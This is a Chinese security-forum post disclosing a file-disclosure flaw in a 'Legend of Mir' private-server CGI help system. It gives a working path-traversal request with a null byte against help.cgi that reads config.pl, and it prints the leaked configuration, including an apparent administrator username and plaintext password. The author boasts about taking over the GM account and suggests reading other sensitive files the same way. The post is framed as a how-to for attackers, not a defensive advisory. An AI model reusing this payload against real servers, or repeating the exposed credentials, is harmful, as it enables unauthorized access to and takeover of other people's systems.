|
 | 作者: abctm [abctm]
 版主 |
登录 |
出处:情感网络 发现者:小路 传奇CGI客服系统,很多人在用,他可以很方便的提供一些服务,方便站长对传奇管理,别的不多说,就是一个文件:help.cgi,是显示一个帮助文件的cgi文件,他没有验证用户提交的url,我们提交: http://xxx.xxx.xxx.xxx:66/help.cgi?T1=../config.pl%00 就能看到: 我们来找个人多的 呵呵 我们看到了GM的角色名字了 再来找密码 辣辣辣~我是GM啦 不在多演示了 # 传奇服务网站程序配置文件 $master_name = "xiaolu"; # 超级管理员用户名(管理中心帐号) $master_pass = 'xiaoxue520'; # 超级管理员密码 $master_page = "雪儿"; # 传奇服务器名字 $master_copy = " \? $master_page tm "; $root_path = 'E:/web/MirWeb'; # HTTP服务器根目录 $PATH=$root_path.$ENV{SCRIPT_NAME}; $PATH=~s!(.*)/(.*?)$!$1/!; # 当前目录 $Mir2BaseDir = 'E:/MirServer'; # 私服主目录 类似的代码,我们就可以来改传奇了,最重要的是可以用来察看一些敏感文件的代码(只要你能猜到目录:))。 [此贴被 日月双星(abctm) 在 05月02日18时01分 编辑过] [此贴被 日月双星(abctm) 在 05月02日18时06分 编辑过] |
| 地主 发表时间: 11/14 22:23 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 私服传奇CGI客服系统泄漏源代码漏洞